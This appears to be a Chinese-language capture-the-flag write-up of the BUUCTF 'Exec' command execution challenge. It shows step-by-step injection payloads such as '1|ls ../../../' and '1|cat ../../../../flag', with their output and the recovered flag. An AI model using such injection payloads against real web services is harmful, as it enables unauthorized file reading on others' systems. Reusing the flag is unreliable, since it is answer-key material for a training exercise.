BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)

导读:本篇文章讲解 BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞),希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com

BUUCTF 之 [ACTF2020 新生赛]Exec(命令执行漏洞)

相关

项目 内容
难度 简单
类型 WEB
靶场 BUUCTF
坐标 Exec

Exec

观察

这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。

界面

网页标题

进攻

构造如下语句显示当前路径中的文件列表:

1|ls

返回结果:

index.php

可以看到并没有我们期望的文件 flag.php

那就去上一级目录看看,构造语句如下:

1|ls ../

返回结果:

html
localhost

注:
这些文件夹都不需要管它,在 CTF 中,flag 文件往往位于根目录下,但也不要被反套路了。

我们再前往上一级目录看看,构造语句如下:

1|ls ../../

返回结果:

cache
empty
lib
local
lock
log
mail
opt
run
spool
tmp
www

仍旧没有发现 flag.php,但没关系,让我们继续纵深探索:

1|ls ../../../

返回结果:

bin
dev
etc
flag
home
lib
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

已经发现 flag 的影子了,让我们换个姿势直捣黄龙:

1|cat ../../../../flag

flag 到手:

flag{10ae5735-4ed8-438d-a682-8a302f6156d6}

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/84038.html

(0)
小半的头像小半

相关推荐

极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!